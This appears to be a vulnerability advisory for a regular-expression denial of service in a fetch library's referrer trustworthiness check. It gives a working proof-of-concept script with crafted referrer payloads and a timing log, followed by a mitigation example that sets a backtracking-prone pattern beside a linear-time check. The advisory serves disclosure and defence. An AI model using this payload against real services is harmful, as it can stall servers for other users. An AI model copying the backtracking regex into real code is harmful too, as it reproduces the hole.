An inefficient regular expression used when trying to match Potentially Trustworthy could lead to a denial of service attack. With a crafted payload of the form 'http://' + 'a.a.'.repeat(i) + 'a', a 76-character payload could take 42642 ms to execute.
// PoC.js
import fetch from 'node-fetch';

// Grow the crafted referrer by one 'a.a.' unit per iteration and time each request.
for (let i = 1; i <= 1000; i++) {
  const time = Date.now();
  const attack_str = 'http://' + 'a.a.'.repeat(i) + 'a';
  const response = await fetch(
    'https://google.com' /* any valid domain */,
    { "referrer": attack_str }
  );
  const time_cost = Date.now() - time;
  console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}

attack_str.length: 12: 248 ms
attack_str.length: 16: 242 ms
attack_str.length: 20: 231 ms
attack_str.length: 24: 231 ms
attack_str.length: 28: 247 ms
attack_str.length: 32: 233 ms
attack_str.length: 36: 218 ms
attack_str.length: 40: 244 ms
attack_str.length: 44: 232 ms
attack_str.length: 48: 230 ms
attack_str.length: 52: 240 ms
attack_str.length: 56: 263 ms
attack_str.length: 60: 406 ms
attack_str.length: 64: 893 ms
attack_str.length: 68: 2908 ms
attack_str.length: 72: 10775 ms
attack_str.length: 76: 42642 ms
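
One way to remove this class of slowdown, as an added example that is not code from the page or from the library. The pattern is an assumed stand-in for a backtracking-prone localhost check (the page does not show the actual regex), set beside a linear-time replacement and an input-length bound; MAX_REFERRER_LENGTH and all function names are hypothetical.

```javascript
// Assumed stand-in pattern (not taken from the page): a greedy group inside a
// repeated group lets "a.a.a." be split in exponentially many ways on failure.
const BACKTRACKING_LOCALHOST = /^(.+\.)*localhost$/;

function isLocalhostRegex(host) {
  return BACKTRACKING_LOCALHOST.test(host);
}

// Linear-time replacement: two plain string comparisons, nothing to backtrack.
function isLocalhostLinear(host) {
  return host === 'localhost' || host.endsWith('.localhost');
}

const MAX_REFERRER_LENGTH = 4096; // hypothetical bound, tune per application

// Bound the input, parse it once, then apply the linear check to the hostname.
function referrerHostIsLocalhost(referrer) {
  if (typeof referrer !== 'string' || referrer.length > MAX_REFERRER_LENGTH) {
    return false;
  }
  let host;
  try {
    host = new URL(referrer).hostname;
  } catch {
    return false; // not a parseable absolute URL
  }
  return isLocalhostLinear(host);
}

// Constructed sample hosts: both checks must agree on every one of them.
const SAMPLE_HOSTS = ['localhost', 'dev.localhost', 'a.b.localhost',
  'notlocalhost', 'localhost.example', 'a.a.a.a'];

function checksAgree() {
  return SAMPLE_HOSTS.every((h) => isLocalhostRegex(h) === isLocalhostLinear(h));
}

// Time one call; used to compare the two checks on the page's payload shape.
function timeMs(fn, arg) {
  const start = performance.now();
  fn(arg);
  return performance.now() - start;
}

const sampleHost = 'a.a.'.repeat(8) + 'a'; // small, constructed instance
console.log('regex  ms:', timeMs(isLocalhostRegex, sampleHost).toFixed(3));
console.log('linear ms:', timeMs(isLocalhostLinear, sampleHost).toFixed(3));
```

The regex timing is only taken on a short host so the comparison finishes quickly; the linear check costs the same order of time at any length under the bound.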